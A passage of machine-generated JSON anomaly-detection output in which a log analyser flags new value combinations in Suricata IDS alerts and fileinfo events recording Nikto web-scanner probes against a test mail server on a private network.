"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.294206+0000\",\"flow_id\":2017848634013862,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46896,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.stm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.stm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.29 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.296158 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46898 -> 192.168.10.154:80", "/parser/model/time": 1583349514.296158, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46898, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.296158 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46898 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.3 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.properties", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.296395+0000\",\"flow_id\":2059741745021279,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46898,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.properties\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.properties\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.296395, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2059741745021279,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46898,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.properties\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.properties\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46898,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.properties\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.properties\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.properties\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.properties\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.properties", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.properties", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46898,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46898, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2059741745021279,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2059741745021279, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.296395+0000\",\"flow_id\":2059741745021279,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46898,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.properties\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.properties\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.3 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.298422 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46900 -> 192.168.10.154:80", "/parser/model/time": 1583349514.298422, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46900, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.298422 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46900 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.3 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.html+", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.298641+0000\",\"flow_id\":1615758090734080,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46900,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.html+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.html+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.298641, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1615758090734080,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46900,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.html+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.html+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46900,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.html+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.html+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.html+\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.html+\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.html+", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.html+", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46900,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46900, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1615758090734080,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1615758090734080, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.298641+0000\",\"flow_id\":1615758090734080,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46900,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.html+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.html+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.3 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.300833 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46902 -> 192.168.10.154:80", "/parser/model/time": 1583349514.300833, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46902, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.300833 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46902 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.3 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.www_acl", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.301150+0000\",\"flow_id\":2081933841044299,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46902,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.www_acl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.www_acl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.30115, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2081933841044299,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46902,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.www_acl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.www_acl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46902,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.www_acl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.www_acl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.www_acl\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.www_acl\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.www_acl", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.www_acl", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": 